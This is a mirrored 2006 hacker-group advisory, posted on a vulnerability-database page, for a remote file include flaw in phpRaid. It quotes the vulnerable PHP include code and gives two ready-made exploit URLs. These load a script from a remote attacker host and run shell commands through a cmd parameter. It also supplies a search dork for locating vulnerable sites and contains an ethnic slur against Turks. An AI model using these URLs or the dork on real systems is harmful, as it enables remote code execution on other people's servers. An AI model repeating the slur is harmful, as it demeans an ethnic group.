Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12591
HistoryMay 09, 2006 - 12:00 a.m.

[Kurdish Security # 4] phpRaid Remote File Include Vulnerability (PHPBB)

2006-05-0900:00:00
vulners.com
12
JSON

Kurdish Security Advisory

phpRaid Remote File Include [PHPBB] :}

"Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & [email protected]

Script : phpRaid

Script Website : http://www.spiffyjr.com/

Version : phpRaid v2.9.5

" v3.0.b1
" v3.0.b2
" v3.0.b3

Risk : High

Class : Remote

Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D

Special Bastard : Turkish Lame

w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)

cmd shell example:

cmd shell variable: ($_GET[cmd]);

Vulnerable code : At first for phpbb portal :)

}
?>
// define our auth type
define("AUTH","phpbb");

// database connection
global $user_group_table;
$user_group_table = $phpbb_prefix . "user_group";

// setup phpBB user integration
define('IN_PHPBB', true);

// set this as the path to your phpBB installation
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);

http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id

http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname
-a

JSON